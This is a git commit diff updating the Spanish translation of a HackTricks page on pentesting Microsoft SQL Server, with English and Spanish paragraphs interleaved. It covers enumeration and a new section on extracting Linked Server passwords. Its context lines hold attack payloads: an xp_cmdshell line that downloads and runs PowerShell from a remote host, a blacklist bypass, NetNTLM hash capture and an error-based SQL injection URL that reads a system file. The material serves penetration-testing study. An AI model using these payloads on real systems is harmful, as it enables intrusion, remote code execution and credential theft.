Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

This commit is contained in:
Translator 2023-10-11 22:49:02 +00:00
parent 6154fd7d00
commit d3629c92d0

View file

@ -7,7 +7,7 @@
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
@ -33,7 +33,7 @@ De [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server).
* **Base de datos master**: Registra toda la información a nivel de sistema para una instancia de SQL Server.
* **Base de datos msdb**: Es utilizada por SQL Server Agent para programar alertas y trabajos.
* **Base de datos model**: Se utiliza como plantilla para todas las bases de datos creadas en la instancia de SQL Server. Las modificaciones realizadas en la base de datos model, como el tamaño de la base de datos, la intercalación, el modelo de recuperación y otras opciones de la base de datos, se aplican a todas las bases de datos creadas posteriormente.
* **Base de datos model**: Es utilizada como plantilla para todas las bases de datos creadas en la instancia de SQL Server. Las modificaciones realizadas en la base de datos model, como el tamaño de la base de datos, la intercalación, el modelo de recuperación y otras opciones de la base de datos, se aplican a todas las bases de datos creadas posteriormente.
* **Base de datos Resource**: Es una base de datos de solo lectura que contiene objetos del sistema que se incluyen con SQL Server. Los objetos del sistema se almacenan físicamente en la base de datos Resource, pero aparecen lógicamente en el esquema sys de cada base de datos.
* **Base de datos tempdb**: Es un espacio de trabajo para almacenar objetos temporales o conjuntos de resultados intermedios.
@ -103,81 +103,37 @@ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
```
#### Enumeración Común
When conducting a penetration test on a Microsoft SQL Server (MSSQL), it is important to perform thorough enumeration to gather information about the target system. This information will help in identifying potential vulnerabilities and weaknesses that can be exploited.
When performing a penetration test on a Microsoft SQL Server (MSSQL) database, it is important to conduct a thorough enumeration of the target system. Enumeration is the process of gathering information about the target system, such as the version of MSSQL being used, the databases present, and the user accounts and privileges.
Durante la realización de una prueba de penetración en un servidor Microsoft SQL (MSSQL), es importante realizar una enumeración exhaustiva para recopilar información sobre el sistema objetivo. Esta información ayudará a identificar posibles vulnerabilidades y debilidades que se pueden explotar.
Durante la realización de una prueba de penetración en una base de datos de Microsoft SQL Server (MSSQL), es importante llevar a cabo una enumeración exhaustiva del sistema objetivo. La enumeración es el proceso de recopilar información sobre el sistema objetivo, como la versión de MSSQL que se está utilizando, las bases de datos presentes y las cuentas de usuario y privilegios.
##### Service Detection
The following are some common enumeration techniques that can be used during a MSSQL penetration test:
##### Detección de Servicios
A continuación, se presentan algunas técnicas de enumeración comunes que se pueden utilizar durante una prueba de penetración de MSSQL:
The first step in the enumeration process is to identify the MSSQL service running on the target system. This can be done using various tools and techniques such as port scanning and banner grabbing.
1. **Banner Grabbing**: This technique involves connecting to the MSSQL server and capturing the banner information, which typically includes the version of MSSQL being used. Tools like `nmap` can be used to perform banner grabbing.
El primer paso en el proceso de enumeración es identificar el servicio MSSQL que se ejecuta en el sistema objetivo. Esto se puede hacer utilizando varias herramientas y técnicas, como el escaneo de puertos y la obtención de banners.
1. **Obtención de Banner**: Esta técnica implica conectarse al servidor MSSQL y capturar la información del banner, que generalmente incluye la versión de MSSQL que se está utilizando. Se pueden utilizar herramientas como `nmap` para realizar la obtención de banner.
##### Port Scanning
2. **Port Scanning**: Conducting a port scan on the target system can help identify open ports and services. Tools like `nmap` can be used to perform port scanning and identify if MSSQL is running on the default port (1433) or a different port.
##### Escaneo de Puertos
2. **Escaneo de Puertos**: Realizar un escaneo de puertos en el sistema objetivo puede ayudar a identificar los puertos y servicios abiertos. Se pueden utilizar herramientas como `nmap` para realizar el escaneo de puertos e identificar si MSSQL se está ejecutando en el puerto predeterminado (1433) o en un puerto diferente.
Port scanning involves scanning the target system's ports to determine which ones are open and listening for incoming connections. This can be done using tools like Nmap or Masscan.
3. **SQL Server Browser Service**: The SQL Server Browser service is responsible for providing information about the SQL Server instances running on the network. By querying the SQL Server Browser service, it is possible to obtain a list of available instances and their corresponding ports.
El escaneo de puertos implica escanear los puertos del sistema objetivo para determinar cuáles están abiertos y escuchando conexiones entrantes. Esto se puede hacer utilizando herramientas como Nmap o Masscan.
3. **Servicio de Explorador de SQL Server**: El servicio de Explorador de SQL Server es responsable de proporcionar información sobre las instancias de SQL Server que se ejecutan en la red. Al consultar el servicio de Explorador de SQL Server, es posible obtener una lista de instancias disponibles y sus puertos correspondientes.
##### Banner Grabbing
4. **Default Credentials**: It is important to test for default credentials, as some MSSQL installations may have default usernames and passwords that are commonly used. Tools like `Hydra` can be used to perform brute-force attacks and test for default credentials.
##### Obtención de Banners
4. **Credenciales Predeterminadas**: Es importante probar las credenciales predeterminadas, ya que algunas instalaciones de MSSQL pueden tener nombres de usuario y contraseñas predeterminados que se utilizan comúnmente. Se pueden utilizar herramientas como `Hydra` para realizar ataques de fuerza bruta y probar las credenciales predeterminadas.
Banner grabbing is the process of retrieving information from the banner or header of a network service. This can be done using tools like Telnet or specialized banner grabbing tools.
5. **SQL Injection**: SQL injection is a technique where malicious SQL statements are inserted into an application's database query. By exploiting SQL injection vulnerabilities, an attacker can extract sensitive information from the database. Tools like `sqlmap` can be used to automate the process of identifying and exploiting SQL injection vulnerabilities.
La obtención de banners es el proceso de recuperar información del banner o encabezado de un servicio de red. Esto se puede hacer utilizando herramientas como Telnet o herramientas especializadas de obtención de banners.
5. **Inyección SQL**: La inyección SQL es una técnica en la que se insertan declaraciones SQL maliciosas en una consulta de base de datos de una aplicación. Al explotar las vulnerabilidades de inyección SQL, un atacante puede extraer información confidencial de la base de datos. Se pueden utilizar herramientas como `sqlmap` para automatizar el proceso de identificación y explotación de vulnerabilidades de inyección SQL.
##### Version Detection
By performing these common enumeration techniques, a penetration tester can gather valuable information about the MSSQL server and its configuration, which can be used to further exploit vulnerabilities and gain unauthorized access to the system.
##### Detección de Versiones
Once the MSSQL service is identified, the next step is to determine the version of MSSQL running on the target system. This information is crucial as different versions may have different vulnerabilities and attack vectors.
Una vez identificado el servicio MSSQL, el siguiente paso es determinar la versión de MSSQL que se ejecuta en el sistema objetivo. Esta información es crucial, ya que diferentes versiones pueden tener diferentes vulnerabilidades y vectores de ataque.
##### SQL Server Browser
##### Explorador de SQL Server
The SQL Server Browser service is responsible for providing information about the SQL Server instances running on a network. It listens on UDP port 1434 and can be used to enumerate the SQL Server instances on the target system.
El servicio SQL Server Browser es responsable de proporcionar información sobre las instancias de SQL Server que se ejecutan en una red. Escucha en el puerto UDP 1434 y se puede utilizar para enumerar las instancias de SQL Server en el sistema objetivo.
##### SQL Server Instance Enumeration
##### Enumeración de Instancias de SQL Server
Once the SQL Server instances are identified, the next step is to enumerate the databases and other objects within each instance. This can be done using tools like SQLPing or by querying the SQL Server using SQL commands.
Una vez identificadas las instancias de SQL Server, el siguiente paso es enumerar las bases de datos y otros objetos dentro de cada instancia. Esto se puede hacer utilizando herramientas como SQLPing o consultando el servidor SQL utilizando comandos SQL.
##### User Enumeration
##### Enumeración de Usuarios
User enumeration involves identifying the users present in the SQL Server instance. This can be done by querying the system tables or by using tools like Metasploit.
La enumeración de usuarios implica identificar los usuarios presentes en la instancia de SQL Server. Esto se puede hacer consultando las tablas del sistema o utilizando herramientas como Metasploit.
##### Password Cracking
##### Descifrado de Contraseñas
If the usernames are known, password cracking can be attempted to gain unauthorized access to the SQL Server instance. This can be done using tools like John the Ripper or Hashcat.
Si se conocen los nombres de usuario, se puede intentar descifrar las contraseñas para obtener acceso no autorizado a la instancia de SQL Server. Esto se puede hacer utilizando herramientas como John the Ripper o Hashcat.
##### Conclusion
##### Conclusión
Thorough enumeration is a critical step in the penetration testing process for MSSQL. It helps in identifying potential vulnerabilities and weaknesses that can be exploited to gain unauthorized access to the target system.
La enumeración exhaustiva es un paso crítico en el proceso de prueba de penetración para MSSQL. Ayuda a identificar posibles vulnerabilidades y debilidades que se pueden explotar para obtener acceso no autorizado al sistema objetivo.
Al realizar estas técnicas de enumeración comunes, un probador de penetración puede recopilar información valiosa sobre el servidor MSSQL y su configuración, que se puede utilizar para explotar aún más las vulnerabilidades y obtener acceso no autorizado al sistema.
```sql
# Get version
select @@version;
@ -290,7 +246,7 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
```
### Robo de hash NetNTLM / Ataque de retransmisión
### Robar el hash NetNTLM / Ataque de retransmisión
Debes iniciar un **servidor SMB** para capturar el hash utilizado en la autenticación (`impacket-smbserver` o `responder`, por ejemplo).
```bash
@ -362,7 +318,21 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTE
```
#### Vector de error para SQLi:
The error-based vector for SQLi is a technique used to exploit vulnerabilities in Microsoft SQL Server (MSSQL). It involves injecting malicious SQL statements into user input fields to trigger errors in the database. These errors can reveal valuable information about the database structure and data, which can be used to further exploit the system. By carefully crafting SQL queries that generate specific error messages, an attacker can gain unauthorized access to the database and perform various malicious actions. It is important for security professionals to be aware of this technique and take necessary measures to protect against SQL injection attacks.
One of the common techniques used to exploit SQL injection vulnerabilities in Microsoft SQL Server is the error-based vector. This technique involves injecting malicious SQL statements into user input fields in order to generate SQL errors, which can then be used to extract information from the database.
Una de las técnicas comunes utilizadas para explotar vulnerabilidades de inyección SQL en Microsoft SQL Server es el vector de error. Esta técnica implica inyectar declaraciones SQL maliciosas en campos de entrada de usuario para generar errores SQL, que luego se pueden utilizar para extraer información de la base de datos.
By carefully crafting SQL queries that intentionally cause errors, an attacker can gain valuable insights into the structure and content of the database. This can include obtaining table and column names, retrieving sensitive data such as usernames and passwords, and even executing arbitrary SQL commands.
Al crear cuidadosamente consultas SQL que causen errores de forma intencional, un atacante puede obtener información valiosa sobre la estructura y el contenido de la base de datos. Esto puede incluir la obtención de nombres de tablas y columnas, la recuperación de datos sensibles como nombres de usuario y contraseñas, e incluso la ejecución de comandos SQL arbitrarios.
To perform an error-based SQL injection attack, the attacker needs to identify vulnerable input fields and inject malicious SQL statements that will trigger an error. This can be done by appending a single quote (') or a double dash (--) to the input, or by using other SQL syntax that is known to cause errors.
Para realizar un ataque de inyección SQL basado en errores, el atacante debe identificar campos de entrada vulnerables e inyectar declaraciones SQL maliciosas que desencadenen un error. Esto se puede hacer agregando una comilla simple (') o un guión doble (--) a la entrada, o utilizando otra sintaxis SQL que se sabe que causa errores.
Once an error is triggered, the attacker can analyze the error message or the server response to gather information about the underlying database. This information can then be used to further exploit the vulnerability and gain unauthorized access to the system.
Una vez que se desencadena un error, el atacante puede analizar el mensaje de error o la respuesta del servidor para recopilar información sobre la base de datos subyacente. Esta información luego se puede utilizar para explotar aún más la vulnerabilidad y obtener acceso no autorizado al sistema.
```
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
@ -417,7 +387,7 @@ Para obtener **más ejemplos**, consulta la [**fuente original**](https://blog.w
### RCE con Función Definida por el Usuario de MSSQL - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
Es posible **cargar un archivo .NET dll dentro de MSSQL con funciones personalizadas**. Sin embargo, esto **requiere acceso a `dbo`**, por lo que necesitas una conexión con la base de datos **como `sa` o con un rol de administrador**.
Es posible **cargar un archivo .NET dll dentro de MSSQL con funciones personalizadas**. Sin embargo, esto **requiere acceso a `dbo`**, por lo que necesitas una conexión con la base de datos **como `sa` o con un rol de Administrador**.
[Sigue este enlace](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) para ver un ejemplo.
@ -425,6 +395,7 @@ Es posible **cargar un archivo .NET dll dentro de MSSQL con funciones personaliz
Existen otros métodos para obtener la ejecución de comandos, como agregar [procedimientos almacenados extendidos](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [Ensamblados CLR](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [Trabajos del Agente de SQL Server](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15) y [scripts externos](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos de amenazas proactivos, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. [**Pruébalo gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoy.
@ -526,7 +497,27 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
## Escalada de Privilegios Local
## Extracción de contraseñas de SQL Server Linked Servers
Un atacante puede extraer contraseñas de SQL Server Linked Servers de las instancias de SQL y obtenerlas en texto claro, otorgando al atacante contraseñas que se pueden utilizar para obtener un mayor control sobre el objetivo.
El script para extraer y descifrar las contraseñas almacenadas para los Linked Servers se puede encontrar [aquí](https://www.richardswinbank.net/admin/extract_linked_server_passwords)
Se deben realizar algunos requisitos y configuraciones para que este exploit funcione.
En primer lugar, debes tener derechos de administrador en la máquina o la capacidad de administrar las configuraciones de SQL Server.
Después de validar tus permisos, debes configurar tres cosas, que son las siguientes:
1. Habilitar TCP/IP en las instancias de SQL Server;
2. Agregar un parámetro de inicio, en este caso, se agregará una bandera de rastreo, que es -T7806.
3. Habilitar la conexión de administración remota.
Para automatizar estas configuraciones, [este repositorio](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) tiene los scripts necesarios.
Además de tener un script de PowerShell para cada paso de la configuración, el repositorio también tiene un script completo que combina los scripts de configuración y la extracción y descifrado de las contraseñas.
Para obtener más información, consulta los siguientes enlaces sobre este ataque:
[Descifrando contraseñas de Linked Servers de bases de datos MSSQL](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
[Resolución de problemas de la conexión de administrador dedicada de SQL Server](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/)
## Escalada de privilegios local
El usuario que ejecuta el servidor MSSQL tendrá habilitado el token de privilegio **SeImpersonatePrivilege.**\
Probablemente podrás **elevarte a Administrador** siguiendo una de estas 2 páginas:
@ -557,13 +548,13 @@ Probablemente podrás **elevarte a Administrador** siguiendo una de estas 2 pág
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos de amenazas proactivas, encuentra problemas en toda tu infraestructura tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. [**Pruébalo gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoy.
Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos de amenazas proactivas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. [**Pruébalo gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoy.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Comandos Automáticos de HackTricks
## Comandos automáticos de HackTricks
```
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.